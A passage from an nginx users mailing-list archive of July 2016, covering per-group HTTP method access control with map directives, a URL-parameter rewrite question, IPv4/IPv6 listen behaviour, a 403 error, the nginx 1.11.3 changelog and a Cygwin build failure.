allowed to GET URL bar, while adminbar > must be able to POST > * ...and so on for ~50 groups. What is a user and group, in this context? (Your example suggests that your client will send a http header "Groups: gfoo" if this request should be handled as if this user is in the group gfoo. Perhaps you are using a special client configuration where that is true?) Is the "foo" in each of "group gfoo", "group adminfoo", "url foo" always identical? As in: can simple pattern-matching work, or do you need an extra mapping somewhere to tie the names together? (This may not matter; but if it is important one way or the other and is *not* included in the problem description, it will probably not be considered for the solution.) > The configuration at this moment is similar to: > > server { > listen 80; > server_name foo.domain.com; > location ~ /content/foo { > if ($denied_foo) { > return 403 "Forbidden"; > } > ... > } > location ~ /page/bar/action...and ~10 locations more per server... > } So that one has foo.domain.com, /content/foo, and /page/bar. > server { > listen 80; > server_name bar.domain.com; > location ~ /content/bar { > if ($denied_bar) { > return 403 "Forbidden"; > } > ... > } > location ~ /page/bar/action...and ~10 locations more per server... > } and that one has bar.domain.com, /content/bar, and /page/bar. Is the /page/bar here the same as the /page/bar in the "foo" section? Or is the "bar" in /page/bar here the same as the "bar" in /content/bar here? Possibly it does not matter; but if it does not matter it should probably not be in the question. > ...~200 whatever.domain.com servers more A bunch of extra servers is not a problem, I think. > map $request_method:$request_uri:$http_groups $denied_foo { > default 1; > ~^GET:/content/foo:gfoo 0; > ~^POST:/content/foo:adminfoo 0; > } > map $request_method:$request_uri:$http_groups $denied_bar { > default 1; > ~^GET:/content/bar:gbat 0; > ~^POST:/content/bar:adminbar 0; > } > ...lots of map directives These map directives look wrong to me. It looks like you should have the $request_uri bit at the end of the "match against this" expansion, since you presumably want /content/bar and /content/bar/something both to match the same way. And it's not clear to me why you have multiple "map" directives. One that sets the single variable "$denied_group" looks like it should be enough. One "default" line; two lines per "foo" or "bar". What am I missing? > I'll like to be able to simplify it doing something like: > > server_name (?.*)\.domain\.com; That can work. > ... > map $request_method:$request_uri:$http_groups $denied { > default 1; > ~^GET:/content/$myvar:g$myvar 0; > ~^POST:/content/$myvar:admin$myvar 0; > } That can't. You would need two lines per "myvar" value -- but since you must have the list of myvar values somewhere, you should be able to auto-generate these lines from that list. > Having ~200 configuration files doesn't seem a good option, so omit > "on-build config with script parameters" I'm not immediately seeing the problem with 200 configuration files. If the problem is "lots of files", then you could concatenate them all in to one file. >From the question, it is not not clear to me whether a user in group gbar should have any access at all to the server foo.domain.com. And it is not clear to me whether there is anything else available below /content/ other than /content/foo/, in the server foo.domain.com. Would a configuration along the lines of == server { location /content/ { if ($denied_group) { return 403 "Forbidden"; } ... } location ~ /page/bar/action...and ~10 locations more per server... } == do what you want? Cheers, f -- Francis Daly francis at daoine.org From mostolog at gmail.com Mon Jul 25 08:41:43 2016 From: mostolog at gmail.com (mostolog at gmail.com) Date: Mon, 25 Jul 2016 10:41:43 +0200 Subject: Using variables on configuration (map?) for regex In-Reply-To: <20160723082819.GV12280@daoine.org> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> <20160723082819.GV12280@daoine.org> Message-ID: <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> Hi > The quick question/answer from the Subject line: > > if you are asking: how do I use a $variable in the "does this match" part > of a "map"; the answer is "you don't". $ is either a literal character > (in a string), or the end-of-string metacharacter (in a regex). Thank you for your clear and concise answer. I wouldn't summarize it better, both question and answer. > (Your example suggests that your client will send a http header "Groups: > gfoo" if this request should be handled as if this user is in the group > gfoo. Perhaps you are using a special client configuration where that > is true?) We're using Apereo CAS. The "grouplist" header comes from a trusted server after user successfully authenticated. > Is the "foo" in each of "group gfoo", "group adminfoo", "url foo" always > identical? As in: can simple pattern-matching work, or do you need an > extra mapping somewhere to tie the names together? Basically, users belongs to groups. Some groups have access to certain operations (GET, PUT, POST, DELETE) on certain URLs. > Is the /page/bar here the same as the /page/bar in the "foo" section? Or > is the "bar" in /page/bar here the same as the "bar" in /content/bar here? > > Possibly it does not matter; but if it does not matter it should probably > not be in the question. These were just examples (that seems to confuse more than help) trying to detail the scenario: "There are rules to allow some groups to do specific actions on certain URLs". eg: * groupAll can GET on /asdf * groupFoo can POST on /foo * groupBar can POST on /bar (again, names and locatiosn are just examples) * groupBonus can DELETE on /foo > These map directives look wrong to me. > > It looks like you should have the $request_uri bit at the end of the > "match against this" expansion, since you presumably want /content/bar > and /content/bar/something both to match the same way. I was using .*, but your approach seems better. > And it's not clear to me why you have multiple "map" directives. One > that sets the single variable "$denied_group" looks like it should > be enough. One "default" line; two lines per "foo" or "bar". What am > I missing? Again, you're right. >> map $request_method:$request_uri:$http_groups $denied { >> default 1; >> ~^GET:/content/$myvar:g$myvar 0; >> ~^POST:/content/$myvar:admin$myvar 0; >> } > That can't. You would need two lines per "myvar" value -- but since > you must have the list of myvar values somewhere, you should be able to > auto-generate these lines from that list. I didn't understand that. > If the problem is "lots of files", then you could concatenate them all > in to one file. A kitty just died somewhere. > From the question, it is not not clear to me whether a user in group gbar > should have any access at all to the server foo.domain.com. And it is > not clear to me whether there is anything else available below /content/ > other than /content/foo/, in the server foo.domain.com. I'm sorry I wasn't able to be more clear. foo.domain.com GET on certain URLs should be allowed for gfoo, gfoobar and gAdmin groups while POST on specific URLs, can be only executed by gfoo and gAdmin DELETE on some URLs only by gAdmin otherwise default is denied bar.domain.com share the "same" rules...the same way like asdf.domain.com, qwerty.domain.com and iloveyou.docmain.com And here is it where I would like to use $variable, instead of copying a bunch of rules for each domain. > Would a configuration along the lines of > > == > server { > location /content/ { > if ($denied_group) { > return 403 "Forbidden"; > } > ... > } > location ~ /page/bar/action...and ~10 locations more per server... > } > == > > do what you want? No, as it doesn't include the method POST/GET part, neither the groups allowed for each URL. Thanks a lot -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Mon Jul 25 17:15:56 2016 From: nginx-forum at forum.nginx.org (iivan) Date: Mon, 25 Jul 2016 13:15:56 -0400 Subject: Full URL parameter in nginx In-Reply-To: <76d78875cb0a9ddd879952d0566bc524.NginxMailingListEnglish@forum.nginx.org> References: <5df555e57f7c3a90870f79fd8dbb54f2.NginxMailingListEnglish@forum.nginx.org> <76d78875cb0a9ddd879952d0566bc524.NginxMailingListEnglish@forum.nginx.org> Message-ID: No one knows how to fix this? :( Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267813,268454#msg-268454 From francis at daoine.org Mon Jul 25 18:42:17 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 25 Jul 2016 19:42:17 +0100 Subject: Using variables on configuration (map?) for regex In-Reply-To: <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> <20160723082819.GV12280@daoine.org> <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> Message-ID: <20160725184217.GX12280@daoine.org> On Mon, Jul 25, 2016 at 10:41:43AM +0200, mostolog at gmail.com wrote: Hi there, > >(Your example suggests that your client will send a http header "Groups: > >gfoo" if this request should be handled as if this user is in the group > >gfoo. Perhaps you are using a special client configuration where that > >is true?) > We're using Apereo CAS. The "grouplist" header comes from a trusted > server after user successfully authenticated. Ok; I've read briefly about CAS, and I do not see how exactly the request gets from the client to nginx. But it sounds like the client does not have access to nginx directly; instead it talks "through" the CAS system which adds this http header to all requests. That suggests that (a) nginx can entirely trust the content of the header; and also (b) potentially the access control could be handled by the CAS system instead of the nginx system. (b) is not something to worry about right now, but may be a path towards a solution if you cannot do what you want purely in nginx conf. > "There are rules to allow some groups to do specific actions on > certain URLs". eg: > > * groupAll can GET on /asdf > * groupFoo can POST on /foo > * groupBar can POST on /bar > (again, names and locatiosn are just examples) > * groupBonus can DELETE on /foo They are examples; but you do have (or have access to) the complete list of groups, methods, and locations that are allowed access, somewhere? See below... > >> map $request_method:$request_uri:$http_groups $denied { > >> default 1; > >> ~^GET:/content/$myvar:g$myvar 0; > >> ~^POST:/content/$myvar:admin$myvar 0; > >> } > >That can't. You would need two lines per "myvar" value -- but since > >you must have the list of myvar values somewhere, you should be able to > >auto-generate these lines from that list. > I didn't understand that. "That can't" refers to "that map directive will not work as you wish, because $myvar is not expanded in the first argument of each pair within the block". "two lines" was because previously the description was that "foo" meant that "gfoo" could GET /content/foo and also that "adminfoo" could POST /content/foo. The rest of it refers to you knowing which groups are allowed which access to which locations; and so you can use the example input above to populate a map directive along the lines of: map $request_method:$http_groups:$request_uri $denied { default 1; ~^GET:groupAll:/asdf 0; ~^POST:groupFoo:/foo 0; ~^POST:groupBar:/bar 0; ~^DELETE:groupBonus:/foo 0; } Having a few hundred lines like that should not be a problem for "map" to read, and hopefully should not be a problem for you to write, since it can be a mechanical export of whatever already has the list of permissions. (And if there isn't something that has the list of permissions, that might be the first thing to resolve.) After than, in your server{} block, you could just do if ($denied) { return 403 "Forbidden"; } outside of all location{}s. Or you could limit it to the locations where you want to control access -- the overall solution depends on the overall requirements. > >If the problem is "lots of files", then you could concatenate them all > >in to one file. > A kitty just died somewhere. That suggests that your objection to "lots of files" is not related to nginx having to open lots of files. (nginx is quite good at opening lots of files, so long as your system allows it to happen.) Perhaps your objection is related to you not wanting to write lots of config? (nginx doesn't care - it doesn't write the config.) Or you not wanting to read lots of config? (nginx is quite good at reading lots of config, even if it looks like mostly-duplicate boilerplate.) Or something else? > foo.domain.com GET on certain URLs should be allowed for gfoo, > gfoobar and gAdmin groups > while POST on specific URLs, can be only executed by gfoo and gAdmin > DELETE on some URLs only by gAdmin > otherwise default is denied Ok, so assuming that that set of method:group:url-prefix is complete, I think I'm missing how it is not working with the previous suggestion. Perhaps include $server_name or $host in the "map" definition if you want to be explicit that (e.g) gfoo should not be able to GET /foo on bar.domain.com; only on foo.domain.com. (That was a piece that I had missed in my previous mail, where I suggested turning the many maps into just one.) > bar.domain.com share the "same" rules...the same way like > asdf.domain.com, qwerty.domain.com and iloveyou.docmain.com > > And here is it where I would like to use $variable, instead of > copying a bunch of rules for each domain. In nginx conf, a variable is a per-request expanded thing. A config-time expandable thing should use a macro processor to turn it into as many static things as are needed, and then let nginx read the static things. In some cases, someone has written the code to use a $variable in a directive. In the case of the "location" directive this has not happened, and I suspect will not happen, in stock nginx. What you are describing is, in nginx terms, the job of a macro processor. Use the one you already know to generate the bunch of similar rules. If the rules fragments are *identical*, you could use the nginx "include" directive, which is about the limit of the built-in "macro" processor. (That is to say: not a macro processor at all.) > >Would a configuration along the lines of > > > >== > > server { > > location /content/ { > > if ($denied_group) { > > return 403 "Forbidden"; > > } > > ... > > } > > location ~ /page/bar/action...and ~10 locations more per server... > > } > >== > > > >do what you want? > No, as it doesn't include the method POST/GET part, neither the > groups allowed for each URL. I thought that it did, assuming that the $denied_group variable is set in the initial "map" definition. Ah - I used "$denied" there and "$denied_group" here; sorry, typo/thinko that was misleading. >From the words I've seen, this looks like it should work. If not, I'm happy to try guessing again. Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Mon Jul 25 23:28:55 2016 From: nginx-forum at forum.nginx.org (nadavkav) Date: Mon, 25 Jul 2016 19:28:55 -0400 Subject: epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream In-Reply-To: References: Message-ID: <064e3026004dd177f5251e58150442e5.NginxMailingListEnglish@forum.nginx.org> I have similar issue Posted at Nginx Forum: https://forum.nginx.org/read.php?2,258050,268458#msg-268458 From francis at daoine.org Mon Jul 25 23:35:37 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 26 Jul 2016 00:35:37 +0100 Subject: Full URL parameter in nginx In-Reply-To: References: <5df555e57f7c3a90870f79fd8dbb54f2.NginxMailingListEnglish@forum.nginx.org> <76d78875cb0a9ddd879952d0566bc524.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160725233537.GY12280@daoine.org> On Mon, Jul 25, 2016 at 01:15:56PM -0400, iivan wrote: Hi there, > No one knows how to fix this? :( Start at the beginning. What request do you make of nginx? What response do you get from nginx? What response do you want instead? My guess is that your nginx config could be ok, and you could change your index.cfm to do what you want it to do with the input you have configured nginx to give it. Maybe it will be clear when there are examples of what works and what fails. Cheers, f -- Francis Daly francis at daoine.org From geuis.teses at gmail.com Tue Jul 26 00:24:46 2016 From: geuis.teses at gmail.com (Charles Lawrence) Date: Mon, 25 Jul 2016 17:24:46 -0700 Subject: Nginx not spawning both ipv4 and ipv6 workers Message-ID: I'm in the process of setting up a new server built on ubuntu 16.04 using nginx 1.10.0. The specific issue is that while my new configuration essentially matches my old nginx configuration from an ubuntu 13.10 server using nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6 workers, but not both. This behavior is not present on the old server. Not sure what else to try at this point. I've verified that my nginx installation was built with ipv6. > nginx version: nginx/1.10.0 (Ubuntu) > built with OpenSSL 1.0.2g-fips 1 Mar 2016 > TLS SNI support enabled > configure arguments: --with-cc-opt='-g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -fPIE -pie -Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_addition_module --with-http_dav_module --with-http_geoip_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_image_filter_module --with-http_v2_module --with-http_sub_module --with-http_xslt_module --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-threads Below are my current configurations for the new server: ># /etc/nginx/nginx.conf> user www-data; > worker_rlimit_nofile 30000; > worker_processes 8; > pid /run/nginx.pid; > > events { > worker_connections 500000; > } > > http { > sendfile on; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 65; > types_hash_max_size 2048; > > include /etc/nginx/mime.types; > default_type application/octet-stream; > > ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE > ssl_prefer_server_ciphers on; > > access_log /var/log/nginx/access.log; > error_log /var/log/nginx/error.log; > > gzip on; > gzip_disable "msie6"; > gzip_vary on; > gzip_proxied any; > gzip_comp_level 6; > gzip_buffers 16 8k; > gzip_http_version 1.1; > gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; > > include /etc/nginx/conf.d/*.conf; > include /etc/nginx/sites-enabled/*; > } Lastly, the weird thing is whether the workers get bound to ipv4 or ipv6 entirely depends on the order in which the listen directives are placed. In the following data, I've switched the order and tried different configurations multiple times. After each change to /etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo service nginx start; sudo lsof -i;to get the data. Also note that I changed the workers count to 8 after performing these steps. However while the number of workers increased, the same behavior was seen where all workers were either ipv4 or ipv6. > listen [::]:80; > listen 80; > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80; > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default ipv6only=on; > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default ipv6only=off; > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > listen 80; > listen [::]:80 default; > nginx 27953 root 6u IPv6 207184 0t0 TCP *:http (LISTEN) > nginx 27954 www-data 6u IPv6 207184 0t0 TCP *:http (LISTEN) From mostolog at gmail.com Tue Jul 26 06:23:01 2016 From: mostolog at gmail.com (mostolog at gmail.com) Date: Tue, 26 Jul 2016 08:23:01 +0200 Subject: Using variables on configuration (map?) for regex In-Reply-To: <20160725184217.GX12280@daoine.org> References: <0cf784ba-b922-97b5-ba17-063e1ebf5014@gmail.com> <20160723082819.GV12280@daoine.org> <52a937c4-fadf-609f-2f0f-42bc8ad58dae@gmail.com> <20160725184217.GX12280@daoine.org> Message-ID: <3ebc4808-8417-38fe-65fe-10b8fb472af2@gmail.com> Hi > Ok; I've read briefly about CAS, and I do not see how exactly the request > gets from the client to nginx. > > But it sounds like the client does not have access to nginx directly; > instead it talks "through" the CAS system which adds this http header > to all requests. You got the idea. > That suggests that (a) nginx can entirely trust the content of the header; > and also (b) potentially the access control could be handled by the CAS > system instead of the nginx system. > > (b) is not something to worry about right now, but may be a path towards > a solution if you cannot do what you want purely in nginx conf. Our current implementation doesn't handle authorization but authentication. That's in the TODO list.. > They are examples; but you do have (or have access to) the complete list > of groups, methods, and locations that are allowed access, somewhere? > > See below... Unfortunately not...at least not in an easy way. I could query LDAP for groups, but that is - IMHO - going too far. Methods: HTTP, locations: yes, I have them on paper :P > "That can't" refers to "that map directive will not work as you wish, > because $myvar is not expanded in the first argument of each pair within > the block". That's a pitty. > map $request_method:$http_groups:$request_uri $denied { > default 1; > ~^GET:groupAll:/asdf 0; > ~^POST:groupFoo:/foo 0; > ~^POST:groupBar:/bar 0; > ~^DELETE:groupBonus:/foo 0; > } That's similar to what I'm doing know... map $request_method:$http_groups:$request_uri $denied { default 1; ~^GET:gfoo:/foo 0; ~^GET:gbar:/bar 0; ... 200 lines ... ~^POST:gfoo:/foo/create 0; ~^POST:gbar:/bar/create 0; ... 200 lines ... } ...and that's why I was trying to reduce it to: map $request_method:$http_groups:$request_uri $denied { default 1; ~^GET:group$group:/$group 0; ~^POST:group$group:/$group/create 0; ... (a few more lines) ... } > Perhaps your objection is related to you not wanting to write lots of > config? (nginx doesn't care - it doesn't write the config.) Or you not > wanting to read lots of config? (nginx is quite good at reading lots > of config, even if it looks like mostly-duplicate boilerplate.) Or > something else? Number of human errors is directly proportional to the number of files you have to handle :P > Ok, so assuming that that set of method:group:url-prefix is complete, > I think I'm missing how it is not working with the previous suggestion. It works...in the long/ugly form > Perhaps include $server_name or $host in the "map" definition if you > want to be explicit that (e.g) gfoo should not be able to GET /foo on > bar.domain.com; only on foo.domain.com. Already doing that, which makes rules appear like: map $request_method:$http_groups:$host:$request_uri $denied { default 1; ~^GET:gfoo:foo.domain.com:/foo 0; ~^GET:gbar:bar.domain.com:/bar 0; ... 200 lines ... ~^POST:gfoo:foo.domain.com:/foo/create 0; ~^POST:gbar:bar.domain.com:/bar/create 0; ... 200 lines ... } > In nginx conf, a variable is a per-request expanded thing. A config-time > expandable thing should use a macro processor to turn it into as many > static things as are needed, and then let nginx read the static things. > > In some cases, someone has written the code to use a $variable in a > directive. In the case of the "location" directive this has not happened, > and I suspect will not happen, in stock nginx. > > What you are describing is, in nginx terms, the job of a macro > processor. Use the one you already know to generate the bunch of similar > rules. If the rules fragments are *identical*, you could use the nginx > "include" directive, which is about the limit of the built-in "macro" > processor. (That is to say: not a macro processor at all.) Did I say it is a pitty? > From the words I've seen, this looks like it should work. If not, I'm > happy to try guessing again. I'm satisfied with my care: You told me on the first message it can't work the way I was trying, so no more headaches You pointed to some cosmetic changes/improvements on my config You spent more time than deserved answering these questions. So, thank you very much. I'll go for the "one long file" option duplicating a few lines for each Have a great week, Regards -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Tue Jul 26 07:46:19 2016 From: nginx-forum at forum.nginx.org (iivan) Date: Tue, 26 Jul 2016 03:46:19 -0400 Subject: Full URL parameter in nginx In-Reply-To: <20160725233537.GY12280@daoine.org> References: <20160725233537.GY12280@daoine.org> Message-ID: Hi Francis, first of all, thank you for your intervention. Look: ## nginx rule: rewrite ^/(.*)?$ /index.cfm?event=saveURL=$1$is_args$args last; ## this URL: http://www.mywebsite.com/http://www.anotherwebsite.com/index.php?lvl=cmspage&pageid=14&id_article=52 ## Return only: http://www.anotherwebsite.com/index.php?lvl=cmspage Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267813,268462#msg-268462 From daniel at mostertman.org Tue Jul 26 08:45:50 2016 From: daniel at mostertman.org (Daniel Mostertman) Date: Tue, 26 Jul 2016 10:45:50 +0200 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: Hi Charles, IPv6 listeners can also accept IPv4 requests. This will result in IPs being passed through to logs and such like ::ffff:192.168.123.101. If you do not want this and do want both, add ipv6only=on to the IPv6 listen line. Dani?l On Jul 26, 2016 02:25, "Charles Lawrence" wrote: > I'm in the process of setting up a new server built on ubuntu 16.04 > using nginx 1.10.0. > > The specific issue is that while my new configuration essentially > matches my old nginx configuration from an ubuntu 13.10 server using > nginx 1.4.4, nginx 1.10.0 is only creating either ipv4 or ipv6 > workers, but not both. This behavior is not present on the old server. > Not sure what else to try at this point. > > I've verified that my nginx installation was built with ipv6. > > > nginx version: nginx/1.10.0 (Ubuntu) > > built with OpenSSL 1.0.2g-fips 1 Mar 2016 > > TLS SNI support enabled > > configure arguments: --with-cc-opt='-g -O2 -fPIE > -fstack-protector-strong -Wformat -Werror=format-security -Wdate-time > -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -fPIE -pie > -Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx > --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log > --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock > --pid-path=/run/nginx.pid --http-client-body-temp-path=/var/lib/nginx/body > --http-fastcgi-temp-path=/var/lib/nginx/fastcgi > --http-proxy-temp-path=/var/lib/nginx/proxy > --http-scgi-temp-path=/var/lib/nginx/scgi > --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit > --with-ipv6 --with-http_ssl_module --with-http_stub_status_module > --with-http_realip_module --with-http_auth_request_module > --with-http_addition_module --with-http_dav_module --with-http_geoip_module > --with-http_gunzip_module --with-http_gzip_static_module > --with-http_image_filter_module --with-http_v2_module --with-htt > p_sub_module --with-http_xslt_module --with-stream > --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-threads > > Below are my current configurations for the new server: > > ># /etc/nginx/nginx.conf> user www-data; > > worker_rlimit_nofile 30000; > > worker_processes 8; > > pid /run/nginx.pid; > > > > events { > > worker_connections 500000; > > } > > > > http { > > sendfile on; > > tcp_nopush on; > > tcp_nodelay on; > > keepalive_timeout 65; > > types_hash_max_size 2048; > > > > include /etc/nginx/mime.types; > > default_type application/octet-stream; > > > > ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE > > ssl_prefer_server_ciphers on; > > > > access_log /var/log/nginx/access.log; > > error_log /var/log/nginx/error.log; > > > > gzip on; > > gzip_disable "msie6"; > > gzip_vary on; > > gzip_proxied any; > > gzip_comp_level 6; > > gzip_buffers 16 8k; > > gzip_http_version 1.1; > > gzip_types text/plain text/css application/json application/javascript > text/xml application/xml application/xml+rss text/javascript; > > > > include /etc/nginx/conf.d/*.conf; > > include /etc/nginx/sites-enabled/*; > > } > > Lastly, the weird thing is whether the workers get bound to ipv4 or > ipv6 entirely depends on the order in which the listen directives are > placed. In the following data, I've switched the order and tried > different configurations multiple times. After each change to > /etc/nginx/sites-enabled/blog I did sudo service nginx stop; sudo > service nginx start; sudo lsof -i;to get the data. > > Also note that I changed the workers count to 8 after performing these > steps. However while the number of workers increased, the same > behavior was seen where all workers were either ipv4 or ipv6. > > > listen [::]:80; > > listen 80; > > nginx 27675 root 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > nginx 27676 www-data 6u IPv4 204423 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80; > > nginx 27747 root 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > nginx 27748 www-data 6u IPv6 205134 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=on; > > nginx 27819 root 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > nginx 27820 www-data 6u IPv6 205849 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default ipv6only=off; > > nginx 27885 root 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > nginx 27886 www-data 6u IPv6 206495 0t0 TCP *:http (LISTEN) > > > > listen 80; > > listen [::]:80 default; > > nginx 27953 root 6u IPv6 207184 0t0 TCP *:http (LISTEN) > > nginx 27954 www-data 6u IPv6 207184 0t0 TCP *:http (LISTEN) > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Tue Jul 26 11:17:05 2016 From: nginx-forum at forum.nginx.org (ndrini) Date: Tue, 26 Jul 2016 07:17:05 -0400 Subject: basic question about Message-ID: I have this server block in a EC2 nginx webserver. server { listen 80 default_server; root /home/a/all; index index.html; location / { try_files $uri $uri/ =404; } } In my idea all the sites that point to the server should show the same page: index.html located in root /home/a/all/index.html But I have an 403 Forbidden nginx/1.4.6 (Ubuntu) :( Why? Thanks, Andrea Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268466,268466#msg-268466 From mdounin at mdounin.ru Tue Jul 26 14:11:18 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 26 Jul 2016 17:11:18 +0300 Subject: nginx-1.11.3 Message-ID: <20160726141118.GC57459@mdounin.ru> Changes with nginx 1.11.3 26 Jul 2016 *) Change: now the "accept_mutex" directive is turned off by default. *) Feature: now nginx uses EPOLLEXCLUSIVE on Linux. *) Feature: the ngx_stream_geo_module. *) Feature: the ngx_stream_geoip_module. *) Feature: the ngx_stream_split_clients_module. *) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" directives in the stream module. *) Bugfix: socket leak when using HTTP/2. *) Bugfix: in configure tests. Thanks to Piotr Sikora. -- Maxim Dounin http://nginx.org/ From kworthington at gmail.com Tue Jul 26 15:12:18 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 26 Jul 2016 11:12:18 -0400 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: <20160726141124.GD57459@mdounin.ru> References: <20160726141124.GD57459@mdounin.ru> Message-ID: Hello Nginx users, Now available: Nginx 1.11.3 for Windows https://kevinworthington.com/nginxwin1113 (32-bit and 64-bit versions) These versions are to support legacy users who are already using Cygwin based builds of Nginx. Officially supported native Windows binaries are at nginx.org. Announcements are also available here: Twitter http://twitter.com/kworthington Google+ https://plus.google.com/+KevinWorthington/ Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 26, 2016 at 10:11 AM, Maxim Dounin wrote: > Changes with nginx 1.11.3 26 Jul > 2016 > > *) Change: now the "accept_mutex" directive is turned off by default. > > *) Feature: now nginx uses EPOLLEXCLUSIVE on Linux. > > *) Feature: the ngx_stream_geo_module. > > *) Feature: the ngx_stream_geoip_module. > > *) Feature: the ngx_stream_split_clients_module. > > *) Feature: variables support in the "proxy_pass" and "proxy_ssl_name" > directives in the stream module. > > *) Bugfix: socket leak when using HTTP/2. > > *) Bugfix: in configure tests. > Thanks to Piotr Sikora. > > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx-announce mailing list > nginx-announce at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx-announce > -------------- next part -------------- An HTML attachment was scrubbed... URL: From kworthington at gmail.com Tue Jul 26 15:15:52 2016 From: kworthington at gmail.com (Kevin Worthington) Date: Tue, 26 Jul 2016 11:15:52 -0400 Subject: [nginx-announce] nginx-1.11.3 In-Reply-To: <20160726141124.GD57459@mdounin.ru> References: <20160726141124.GD57459@mdounin.ru> Message-ID: Hello! When building on Cygwin on Windows 7, using the --with-stream flag, it fails. Here is my configure with options: ./configure --with-http_ssl_module --with-http_gzip_static_module --with-pcre-jit --with-debug --with-http_addition_module --with-http_auth_request_module --with-http_dav_module --with-http_gzip_static_module --with-http_image_filter_module --with-http_realip_module --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module --with-http_xslt_module 0--with-ipv6 --with-mail --with-mail_ssl_module Output of section where it errors out: cc -c -pipe -O -W -Wall -Wpointer-arith -Wno-unused-parameter -Werror -g -D FD_ SETSIZE=2048 -I src/core -I src/event -I src/event/modules -I src/os/unix -I /us r/include/libxml2 -I objs -I src/stream \ -o objs/src/stream/ngx_stream_proxy_module.o \ src/stream/ngx_stream_proxy_module.c src/stream/ngx_stream_proxy_module.c: In function `ngx_stream_proxy_handler': src/stream/ngx_stream_proxy_module.c:542:6: error: `ngx_stream_upstream_t' has n o member named `ssl_name' u->ssl_name = uscf->host; ^ objs/Makefile:1520: recipe for target 'objs/src/stream/ngx_stream_proxy_module.o ' failed make[1]: *** [objs/src/stream/ngx_stream_proxy_module.o] Error 1 make[1]: Leaving directory '/home/kevin.worthington/nginx-1.11.3' Makefile:8: recipe for target 'build' failed make: *** [build] Error 2 I would appreciate any help. I'm not sure if this is a bug or just incompatible on Cygwin. Thank you, Kevin -- Kevin Worthington kworthington *@* (gmail] [dot} {com) http://kevinworthington.com/ http://twitter.com/kworthington https://plus.google.com/+KevinWorthington/ On Tue, Jul 26, 2016 at 10:11 AM, Maxim Dounin wrote: > Changes with nginx 1.11.3 26 Jul > 2016 > > *) Change: now the "accept_mutex" directive is turned off by default. > > *) Feature: now nginx uses 